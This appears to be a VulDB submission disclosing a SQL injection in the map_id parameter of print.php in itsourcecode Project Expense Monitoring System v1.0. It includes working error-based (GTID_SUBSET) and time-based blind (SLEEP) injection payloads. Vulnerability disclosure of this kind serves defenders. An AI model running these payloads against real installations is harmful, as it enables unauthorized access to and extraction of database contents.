| 标题 | itsourcecode Project Expense Monitoring System v1.0 SQLi |
|---|
| 描述 | Constructing a special SQL statement in the print.php page and passing it in the map_id parameter can lead to a SQL injection vulnerability.
POC:
Parameter: map_id (GET)
Type: error-based
Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
Payload: map_id=67' AND GTID_SUBSET(CONCAT(0x7162627a71,(SELECT (ELT(5075=5075,1))),0x716b717671),5075)-- xGVQ
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: map_id=67' AND (SELECT 2049 FROM (SELECT(SLEEP(5)))IStZ)-- PtEB |
|---|
| 来源 | ⚠️ https://github.com/DeepMountains/zzz/blob/main/CVE3-3.md |
|---|
| 用户 | GUOTINGTING (UID 73614) |
|---|
| 提交 | 2024-08-17 14時15分 (2 年前) |
|---|
| 管理 | 2024-08-19 16時12分 (2 days later) |
|---|
| 状态 | 已接受 |
|---|
| VulDB条目 | 275120 [itsourcecode Project Expense Monitoring System 1.0 print.php map_id SQL注入] |
|---|
| 积分 | 20 |
|---|